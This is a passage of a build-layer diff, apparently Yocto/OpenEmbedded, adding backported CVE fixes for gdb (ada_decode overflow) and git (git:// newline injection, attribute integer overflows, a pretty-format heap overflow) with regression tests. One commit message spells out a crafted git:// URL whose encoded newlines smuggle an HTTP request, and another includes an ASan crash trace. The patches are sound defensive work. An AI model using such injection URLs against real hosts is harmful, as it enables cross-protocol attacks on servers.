diff --git a/meta/recipes-devtools/gdb/gdb-9.1.inc b/meta/recipes-devtools/gdb/gdb-9.1.inc
index d019e6b384..212c554cf1 100644
--- a/meta/recipes-devtools/gdb/gdb-9.1.inc
+++ b/meta/recipes-devtools/gdb/gdb-9.1.inc
@@ -16,6 +16,7 @@ SRC_URI = "${GNU_MIRROR}/gdb/gdb-${PV}.tar.xz \
file://0009-resolve-restrict-keyword-conflict.patch \
file://0010-Fix-invalid-sigprocmask-call.patch \
file://0011-gdbserver-ctrl-c-handling.patch \
+ file://0012-CVE-2023-39128.patch \
"
SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655"
SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737"
diff --git a/meta/recipes-devtools/gdb/gdb-common.inc b/meta/recipes-devtools/gdb/gdb-common.inc
index 08f615addf..7a4793a73f 100644
--- a/meta/recipes-devtools/gdb/gdb-common.inc
+++ b/meta/recipes-devtools/gdb/gdb-common.inc
@@ -1,5 +1,6 @@
SUMMARY = "GNU debugger"
HOMEPAGE = "http://www.gnu.org/software/gdb/"
+DESCRIPTION = "GDB, the GNU Project debugger, allows you to see what is going on inside another program while it executes -- or what another program was doing at the moment it crashed."
SECTION = "devel"
DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native"
diff --git a/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
new file mode 100644
index 0000000000..6445455bde
--- /dev/null
+++ b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
@@ -0,0 +1,75 @@
+From 033bc52bb6190393c8eed80925fa78cc35b40c6d Mon Sep 17 00:00:00 2001
+From: Tom Tromey <tromey@adacore.com>
+Date: Wed, 16 Aug 2023 11:29:19 -0600
+Subject: [PATCH] Avoid buffer overflow in ada_decode
+
+A bug report pointed out a buffer overflow in ada_decode, which Keith
+helpfully analyzed. ada_decode had a logic error when the input was
+all digits. While this isn't valid -- and would probably only appear
+in fuzzer tests -- it still should be handled properly.
+
+This patch adds a missing bounds check. Tested with the self-tests in
+an asan build.
+
+Bug: https://sourceware.org/bugzilla/show_bug.cgi?id=30639
+Reviewed-by: Keith Seitz <keiths@redhat.com>
+
+Upstream-Status: Backport from [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=033bc52bb6190393c8eed80925fa78cc35b40c6d]
+CVE: CVE-2023-39128
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ gdb/ada-lang.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/gdb/ada-lang.c b/gdb/ada-lang.c
+index 0c2d4fc..40852b6 100644
+--- a/gdb/ada-lang.c
++++ b/gdb/ada-lang.c
+@@ -56,6 +56,7 @@
+ #include "cli/cli-utils.h"
+ #include "gdbsupport/function-view.h"
+ #include "gdbsupport/byte-vector.h"
++#include "gdbsupport/selftest.h"
+ #include <algorithm>
+
+ /* Define whether or not the C operator '/' truncates towards zero for
+@@ -1184,7 +1185,7 @@ ada_decode (const char *encoded)
+ i -= 1;
+ if (i > 1 && encoded[i] == '_' && encoded[i - 1] == '_')
+ len0 = i - 1;
+- else if (encoded[i] == '$')
++ else if (i >= 0 && encoded[i] == '$')
+ len0 = i;
+ }
+
+@@ -1350,6 +1351,18 @@ Suppress:
+
+ }
+
++#ifdef GDB_SELF_TEST
++
++static void
++ada_decode_tests ()
++{
++ /* This isn't valid, but used to cause a crash. PR gdb/30639. The
++ result does not really matter very much. */
++ SELF_CHECK (ada_decode ("44") == "44");
++}
++
++#endif
++
+ /* Table for keeping permanent unique copies of decoded names. Once
+ allocated, names in this table are never released. While this is a
+ storage leak, it should not be significant unless there are massive
+@@ -14345,4 +14358,8 @@ DWARF attribute."),
+ gdb::observers::new_objfile.attach (ada_new_objfile_observer);
+ gdb::observers::free_objfile.attach (ada_free_objfile_observer);
+ gdb::observers::inferior_exit.attach (ada_inferior_exit);
++
++#ifdef GDB_SELF_TEST
++ selftests::register_test ("ada-decode", ada_decode_tests);
++#endif
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
new file mode 100644
index 0000000000..725f98f0b7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
@@ -0,0 +1,108 @@
+From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 25 Nov 2021 06:36:26 +0000
+Subject: [PATCH] git_connect_git(): forbid newlines in host and path
+
+When we connect to a git:// server, we send an initial request that
+looks something like:
+
+ 002dgit-upload-pack repo.git\0host=example.com
+
+If the repo path contains a newline, then it's included literally, and
+we get:
+
+ 002egit-upload-pack repo
+ .git\0host=example.com
+
+This works fine if you really do have a newline in your repository name;
+the server side uses the pktline framing to parse the string, not
+newlines. However, there are many _other_ protocols in the wild that do
+parse on newlines, such as HTTP. So a carefully constructed git:// URL
+can actually turn into a valid HTTP request. For example:
+
+ git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
+
+becomes:
+
+ 0050git-upload-pack /
+ GET / HTTP/1.1
+ Host:localhost
+
+ host=localhost:1234
+
+on the wire. Again, this isn't a problem for a real Git server, but it
+does mean that feeding a malicious URL to Git (e.g., through a
+submodule) can cause it to make unexpected cross-protocol requests.
+Since repository names with newlines are presumably quite rare (and
+indeed, we already disallow them in git-over-http), let's just disallow
+them over this protocol.
+
+Hostnames could likewise inject a newline, but this is unlikely to be a
+problem in practice; we'd try resolving the hostname with a newline in
+it, which wouldn't work. Still, it doesn't hurt to err on the side of
+caution there, since we would not expect them to work in the first
+place.
+
+The ssh and local code paths are unaffected by this patch. In both cases
+we're trying to run upload-pack via a shell, and will quote the newline
+so that it makes it intact. An attacker can point an ssh url at an
+arbitrary port, of course, but unless there's an actual ssh server
+there, we'd never get as far as sending our shell command anyway. We
+_could_ similarly restrict newlines in those protocols out of caution,
+but there seems little benefit to doing so.
+
+The new test here is run alongside the git-daemon tests, which cover the
+same protocol, but it shouldn't actually contact the daemon at all. In
+theory we could make the test more robust by setting up an actual
+repository with a newline in it (so that our clone would succeed if our
+new check didn't kick in). But a repo directory with newline in it is
+likely not portable across all filesystems. Likewise, we could check
+git-daemon's log that it was not contacted at all, but we do not
+currently record the log (and anyway, it would make the test racy with
+the daemon's log write). We'll just check the client-side stderr to make
+sure we hit the expected code path.
+
+Reported-by: Harold Kim <h.kim@flatt.tech>
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]
+CVE: CVE-2021-40330
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ connect.c | 2 ++
+ t/t5570-git-daemon.sh | 5 +++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/connect.c b/connect.c
+index b6451ab..929de9a 100644
+--- a/connect.c
++++ b/connect.c
+@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport,
+ target_host = xstrdup(hostandport);
+
+ transport_check_allowed("git");
++ if (strchr(target_host, '\n') || strchr(path, '\n'))
++ die(_("newline is forbidden in git:// hosts and repo paths"));
+
+ /*
+ * These underlying connection commands die() if they
+diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh
+index 34487bb..79cd218 100755
+--- a/t/t5570-git-daemon.sh
++++ b/t/t5570-git-daemon.sh
+@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' '
+ )
+ '
+
++test_expect_success 'client refuses to ask for repo with newline' '
++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr &&
++ test_i18ngrep newline.is.forbidden stderr
++'
++
+ test_remote_error()
+ {
+ do_export=YesPlease
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-23521.patch b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
new file mode 100644
index 0000000000..974546013d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
@@ -0,0 +1,367 @@
+From eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:45:15 +0100
+Subject: [PATCH] CVE-2022-23521
+
+attr: fix overflow when upserting attribute with overly long name
+
+The function `git_attr_internal()` is called to upsert attributes into
+the global map. And while all callers pass a `size_t`, the function
+itself accepts an `int` as the attribute name's length. This can lead to
+an integer overflow in case the attribute name is longer than `INT_MAX`.
+
+Now this overflow seems harmless as the first thing we do is to call
+`attr_name_valid()`, and that function only succeeds in case all chars
+in the range of `namelen` match a certain small set of chars. We thus
+can't do an out-of-bounds read as NUL is not part of that set and all
+strings passed to this function are NUL-terminated. And furthermore, we
+wouldn't ever read past the current attribute name anyway due to the
+same reason. And if validation fails we will return early.
+
+On the other hand it feels fragile to rely on this behaviour, even more
+so given that we pass `namelen` to `FLEX_ALLOC_MEM()`. So let's instead
+just do the correct thing here and accept a `size_t` as line length.
+
+Upstream-Status: Backport [https://github.com/git/git/commit/eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 & https://github.com/git/git/commit/8d0d48cf2157cfb914db1f53b3fe40785b86f3aa & https://github.com/git/git/commit/24557209500e6ed618f04a8795a111a0c491a29c & https://github.com/git/git/commit/34ace8bad02bb14ecc5b631f7e3daaa7a9bba7d9 & https://github.com/git/git/commit/447ac906e189535e77dcb1f4bbe3f1bc917d4c12 & https://github.com/git/git/commit/e1e12e97ac73ded85f7d000da1063a774b3cc14f & https://github.com/git/git/commit/a60a66e409c265b2944f18bf43581c146812586d & https://github.com/git/git/commit/d74b1fd54fdbc45966d12ea907dece11e072fb2b & https://github.com/git/git/commit/dfa6b32b5e599d97448337ed4fc18dd50c90758f & https://github.com/git/git/commit/3c50032ff5289cc45659f21949c8d09e52164579]
+
+CVE: CVE-2022-23521
+
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ attr.c | 97 +++++++++++++++++++++++++++----------------
+ attr.h | 12 ++++++
+ t/t0003-attributes.sh | 59 ++++++++++++++++++++++++++
+ 3 files changed, 132 insertions(+), 36 deletions(-)
+
+diff --git a/attr.c b/attr.c
+index 11f19b5..63484ab 100644
+--- a/attr.c
++++ b/attr.c
+@@ -29,7 +29,7 @@ static const char git_attr__unknown[] = "(builtin)unknown";
+ #endif
+
+ struct git_attr {
+- int attr_nr; /* unique attribute number */
++ unsigned int attr_nr; /* unique attribute number */
+ char name[FLEX_ARRAY]; /* attribute name */
+ };
+
+@@ -221,7 +221,7 @@ static void report_invalid_attr(const char *name, size_t len,
+ * dictionary. If no entry is found, create a new attribute and store it in
+ * the dictionary.
+ */
+-static const struct git_attr *git_attr_internal(const char *name, int namelen)
++static const struct git_attr *git_attr_internal(const char *name, size_t namelen)
+ {
+ struct git_attr *a;
+
+@@ -237,8 +237,8 @@ static const struct git_attr *git_attr_internal(const char *name, int namelen)
+ a->attr_nr = hashmap_get_size(&g_attr_hashmap.map);
+
+ attr_hashmap_add(&g_attr_hashmap, a->name, namelen, a);
+- assert(a->attr_nr ==
+- (hashmap_get_size(&g_attr_hashmap.map) - 1));
++ if (a->attr_nr != hashmap_get_size(&g_attr_hashmap.map) - 1)
++ die(_("unable to add additional attribute"));
+ }
+
+ hashmap_unlock(&g_attr_hashmap);
+@@ -283,7 +283,7 @@ struct match_attr {
+ const struct git_attr *attr;
+ } u;
+ char is_macro;
+- unsigned num_attr;
++ size_t num_attr;
+ struct attr_state state[FLEX_ARRAY];
+ };
+
+@@ -300,7 +300,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ struct attr_state *e)
+ {
+ const char *ep, *equals;
+- int len;
++ size_t len;
+
+ ep = cp + strcspn(cp, blank);
+ equals = strchr(cp, '=');
+@@ -344,8 +344,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ int lineno, int macro_ok)
+ {
+- int namelen;
+- int num_attr, i;
++ size_t namelen, num_attr, i;
+ const char *cp, *name, *states;
+ struct match_attr *res = NULL;
+ int is_macro;
+@@ -356,6 +355,11 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ return NULL;
+ name = cp;
+
++ if (strlen(line) >= ATTR_MAX_LINE_LENGTH) {
++ warning(_("ignoring overly long attributes line %d"), lineno);
++ return NULL;
++ }
++
+ if (*cp == '"' && !unquote_c_style(&pattern, name, &states)) {
+ name = pattern.buf;
+ namelen = pattern.len;
+@@ -392,10 +396,9 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ goto fail_return;
+ }
+
+- res = xcalloc(1,
+- sizeof(*res) +
+- sizeof(struct attr_state) * num_attr +
+- (is_macro ? 0 : namelen + 1));
++ res = xcalloc(1, st_add3(sizeof(*res),
++ st_mult(sizeof(struct attr_state), num_attr),
++ is_macro ? 0 : namelen + 1));
+ if (is_macro) {
+ res->u.attr = git_attr_internal(name, namelen);
+ } else {
+@@ -458,11 +461,12 @@ struct attr_stack {
+
+ static void attr_stack_free(struct attr_stack *e)
+ {
+- int i;
++ unsigned i;
+ free(e->origin);
+ for (i = 0; i < e->num_matches; i++) {
+ struct match_attr *a = e->attrs[i];
+- int j;
++ size_t j;
++
+ for (j = 0; j < a->num_attr; j++) {
+ const char *setto = a->state[j].setto;
+ if (setto == ATTR__TRUE ||
+@@ -671,8 +675,8 @@ static void handle_attr_line(struct attr_stack *res,
+ a = parse_attr_line(line, src, lineno, macro_ok);
+ if (!a)
+ return;
+- ALLOC_GROW(res->attrs, res->num_matches + 1, res->alloc);
+- res->attrs[res->num_matches++] = a;
++ ALLOC_GROW_BY(res->attrs, res->num_matches, 1, res->alloc);
++ res->attrs[res->num_matches - 1] = a;
+ }
+
+ static struct attr_stack *read_attr_from_array(const char **list)
+@@ -711,21 +715,37 @@ void git_attr_set_direction(enum git_attr_direction new_direction)
+
+ static struct attr_stack *read_attr_from_file(const char *path, int macro_ok)
+ {
++ struct strbuf buf = STRBUF_INIT;
+ FILE *fp = fopen_or_warn(path, "r");
+ struct attr_stack *res;
+- char buf[2048];
+ int lineno = 0;
++ int fd;
++ struct stat st;
+
+ if (!fp)
+ return NULL;
+- res = xcalloc(1, sizeof(*res));
+- while (fgets(buf, sizeof(buf), fp)) {
+- char *bufp = buf;
+- if (!lineno)
+- skip_utf8_bom(&bufp, strlen(bufp));
+- handle_attr_line(res, bufp, path, ++lineno, macro_ok);
++
++ fd = fileno(fp);
++ if (fstat(fd, &st)) {
++ warning_errno(_("cannot fstat gitattributes file '%s'"), path);
++ fclose(fp);
++ return NULL;
+ }
++ if (st.st_size >= ATTR_MAX_FILE_SIZE) {
++ warning(_("ignoring overly large gitattributes file '%s'"), path);
++ fclose(fp);
++ return NULL;
++ }
++
++ CALLOC_ARRAY(res, 1);
++ while (strbuf_getline(&buf, fp) != EOF) {
++ if (!lineno && starts_with(buf.buf, utf8_bom))
++ strbuf_remove(&buf, 0, strlen(utf8_bom));
++ handle_attr_line(res, buf.buf, path, ++lineno, macro_ok);
++ }
++
+ fclose(fp);
++ strbuf_release(&buf);
+ return res;
+ }
+
+@@ -736,13 +756,18 @@ static struct attr_stack *read_attr_from_index(const struct index_state *istate,
+ struct attr_stack *res;
+ char *buf, *sp;
+ int lineno = 0;
++ size_t size;
+
+ if (!istate)
+ return NULL;
+
+- buf = read_blob_data_from_index(istate, path, NULL);
++ buf = read_blob_data_from_index(istate, path, &size);
+ if (!buf)
+ return NULL;
++ if (size >= ATTR_MAX_FILE_SIZE) {
++ warning(_("ignoring overly large gitattributes blob '%s'"), path);
++ return NULL;
++ }
+
+ res = xcalloc(1, sizeof(*res));
+ for (sp = buf; *sp; ) {
+@@ -1012,12 +1037,12 @@ static int macroexpand_one(struct all_attrs_item *all_attrs, int nr, int rem);
+ static int fill_one(const char *what, struct all_attrs_item *all_attrs,
+ const struct match_attr *a, int rem)
+ {
+- int i;
++ size_t i;
+
+- for (i = a->num_attr - 1; rem > 0 && i >= 0; i--) {
+- const struct git_attr *attr = a->state[i].attr;
++ for (i = a->num_attr; rem > 0 && i > 0; i--) {
++ const struct git_attr *attr = a->state[i - 1].attr;
+ const char **n = &(all_attrs[attr->attr_nr].value);
+- const char *v = a->state[i].setto;
++ const char *v = a->state[i - 1].setto;
+
+ if (*n == ATTR__UNKNOWN) {
+ debug_set(what,
+@@ -1036,11 +1061,11 @@ static int fill(const char *path, int pathlen, int basename_offset,
+ struct all_attrs_item *all_attrs, int rem)
+ {
+ for (; rem > 0 && stack; stack = stack->prev) {
+- int i;
++ unsigned i;
+ const char *base = stack->origin ? stack->origin : "";
+
+- for (i = stack->num_matches - 1; 0 < rem && 0 <= i; i--) {
+- const struct match_attr *a = stack->attrs[i];
++ for (i = stack->num_matches; 0 < rem && 0 < i; i--) {
++ const struct match_attr *a = stack->attrs[i - 1];
+ if (a->is_macro)
+ continue;
+ if (path_matches(path, pathlen, basename_offset,
+@@ -1071,11 +1096,11 @@ static void determine_macros(struct all_attrs_item *all_attrs,
+ const struct attr_stack *stack)
+ {
+ for (; stack; stack = stack->prev) {
+- int i;
+- for (i = stack->num_matches - 1; i >= 0; i--) {
+- const struct match_attr *ma = stack->attrs[i];
++ unsigned i;
++ for (i = stack->num_matches; i > 0; i--) {
++ const struct match_attr *ma = stack->attrs[i - 1];
+ if (ma->is_macro) {
+- int n = ma->u.attr->attr_nr;
++ unsigned int n = ma->u.attr->attr_nr;
+ if (!all_attrs[n].macro) {
+ all_attrs[n].macro = ma;
+ }
+@@ -1127,7 +1152,7 @@ void git_check_attr(const struct index_state *istate,
+ collect_some_attrs(istate, path, check);
+
+ for (i = 0; i < check->nr; i++) {
+- size_t n = check->items[i].attr->attr_nr;
++ unsigned int n = check->items[i].attr->attr_nr;
+ const char *value = check->all_attrs[n].value;
+ if (value == ATTR__UNKNOWN)
+ value = ATTR__UNSET;
+diff --git a/attr.h b/attr.h
+index b0378bf..f424285 100644
+--- a/attr.h
++++ b/attr.h
+@@ -1,6 +1,18 @@
+ #ifndef ATTR_H
+ #define ATTR_H
+
++/**
++ * The maximum line length for a gitattributes file. If the line exceeds this
++ * length we will ignore it.
++ */
++#define ATTR_MAX_LINE_LENGTH 2048
++
++ /**
++ * The maximum size of the giattributes file. If the file exceeds this size we
++ * will ignore it.
++ */
++#define ATTR_MAX_FILE_SIZE (100 * 1024 * 1024)
++
+ struct index_state;
+
+ /* An attribute is a pointer to this opaque structure */
+diff --git a/t/t0003-attributes.sh b/t/t0003-attributes.sh
+index 71e63d8..556245b 100755
+--- a/t/t0003-attributes.sh
++++ b/t/t0003-attributes.sh
+@@ -342,4 +342,63 @@ test_expect_success 'query binary macro directly' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'large attributes line ignored in tree' '
++ test_when_finished "rm .gitattributes" &&
++ printf "path %02043d" 1 >.gitattributes &&
++ git check-attr --all path >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in tree' '
++ test_when_finished "rm .gitattributes" &&
++ # older versions of Git broke lines at 2048 bytes; the 2045 bytes
++ # of 0-padding here is accounting for the three bytes of "a 1", which
++ # would knock "trailing" to the "next" line, where it would be
++ # erroneously parsed.
++ printf "a %02045dtrailing attribute\n" 1 >.gitattributes &&
++ git check-attr --all trailing >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in tree' '
++ test_when_finished "rm .gitattributes" &&
++ dd if=/dev/zero of=.gitattributes bs=101M count=1 2>/dev/null &&
++ git check-attr --all path >/dev/null 2>err &&
++ echo "warning: ignoring overly large gitattributes file ${SQ}.gitattributes${SQ}" >expect &&
++ test_cmp expect err
++'
++
++test_expect_success 'large attributes line ignored in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(printf "path %02043d" 1 | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all path >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(printf "a %02045dtrailing attribute\n" 1 | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all trailing >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(dd if=/dev/zero bs=101M count=1 2>/dev/null | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all path >/dev/null 2>err &&
++ echo "warning: ignoring overly large gitattributes blob ${SQ}.gitattributes${SQ}" >expect &&
++ test_cmp expect err
++'
++
+ test_done
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
new file mode 100644
index 0000000000..87091abd47
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
@@ -0,0 +1,39 @@
+From a244dc5b0a629290881641467c7a545de7508ab2 Mon Sep 17 00:00:00 2001
+From: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Date: Tue, 2 Nov 2021 15:46:06 +0000
+Subject: [PATCH 01/12] test-lib: add prerequisite for 64-bit platforms
+
+Allow tests that assume a 64-bit `size_t` to be skipped in 32-bit
+platforms and regardless of the size of `long`.
+
+This imitates the `LONG_IS_64BIT` prerequisite.
+
+Signed-off-by: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/a244dc5b0a629290881641467c7a545de7508ab2]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/test-lib.sh | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/t/test-lib.sh b/t/test-lib.sh
+index e06fa02..db5ec2f 100644
+--- a/t/test-lib.sh
++++ b/t/test-lib.sh
+@@ -1613,6 +1613,10 @@ build_option () {
+ sed -ne "s/^$1: //p"
+ }
+
++test_lazy_prereq SIZE_T_IS_64BIT '
++ test 8 -eq "$(build_option sizeof-size_t)"
++'
++
+ test_lazy_prereq LONG_IS_64BIT '
+ test 8 -le "$(build_option sizeof-long)"
+ '
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
new file mode 100644
index 0000000000..f35e55b585
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
@@ -0,0 +1,187 @@
+From 81dc898df9b4b4035534a927f3234a3839b698bf Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:25 +0100
+Subject: [PATCH 02/12] pretty: fix out-of-bounds write caused by integer overflow
+
+When using a padding specifier in the pretty format passed to git-log(1)
+we need to calculate the string length in several places. These string
+lengths are stored in `int`s though, which means that these can easily
+overflow when the input lengths exceeds 2GB. This can ultimately lead to
+an out-of-bounds write when these are used in a call to memcpy(3P):
+
+ ==8340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1ec62f97fe at pc 0x7f2127e5f427 bp 0x7ffd3bd63de0 sp 0x7ffd3bd63588
+ WRITE of size 1 at 0x7f1ec62f97fe thread T0
+ #0 0x7f2127e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5628e96aa605 in format_and_pad_commit pretty.c:1762
+ #2 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+ #3 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+ #4 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+ #5 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+ #6 0x5628e95a44c8 in show_log log-tree.c:781
+ #7 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+ #8 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+ #10 0x5628e922f1a2 in cmd_log builtin/log.c:883
+ #11 0x5628e9106993 in run_builtin git.c:466
+ #12 0x5628e9107397 in handle_builtin git.c:721
+ #13 0x5628e9107b07 in run_argv git.c:788
+ #14 0x5628e91088a7 in cmd_main git.c:923
+ #15 0x5628e939d682 in main common-main.c:57
+ #16 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x7f1ec62f97fe is located 2 bytes to the left of 4831838265-byte region [0x7f1ec62f9800,0x7f1fe62f9839)
+ allocated by thread T0 here:
+ #0 0x7f2127ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5628e98774d4 in xrealloc wrapper.c:136
+ #2 0x5628e97cb01c in strbuf_grow strbuf.c:99
+ #3 0x5628e97ccd42 in strbuf_addchars strbuf.c:327
+ #4 0x5628e96aa55c in format_and_pad_commit pretty.c:1761
+ #5 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+ #6 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+ #7 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+ #8 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+ #9 0x5628e95a44c8 in show_log log-tree.c:781
+ #10 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+ #11 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+ #12 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+ #13 0x5628e922f1a2 in cmd_log builtin/log.c:883
+ #14 0x5628e9106993 in run_builtin git.c:466
+ #15 0x5628e9107397 in handle_builtin git.c:721
+ #16 0x5628e9107b07 in run_argv git.c:788
+ #17 0x5628e91088a7 in cmd_main git.c:923
+ #18 0x5628e939d682 in main common-main.c:57
+ #19 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #20 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #21 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0fe458c572a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ =>0x0fe458c572f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
+ 0x0fe458c57300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==8340==ABORTING
+
+The pretty format can also be used in `git archive` operations via the
+`export-subst` attribute. This is what, in our opinion, makes this a
+critical issue in the context of Git forges that allow downloading an
+archive of user-supplied Git repositories.
+
+Fix this vulnerability by using `size_t` instead of `int` to track the
+string lengths. Add tests which detect this vulnerability when Git is
+compiled with the address sanitizer.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Original-patch-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Modified-by: Taylor Blau <me@ttaylorr.com>
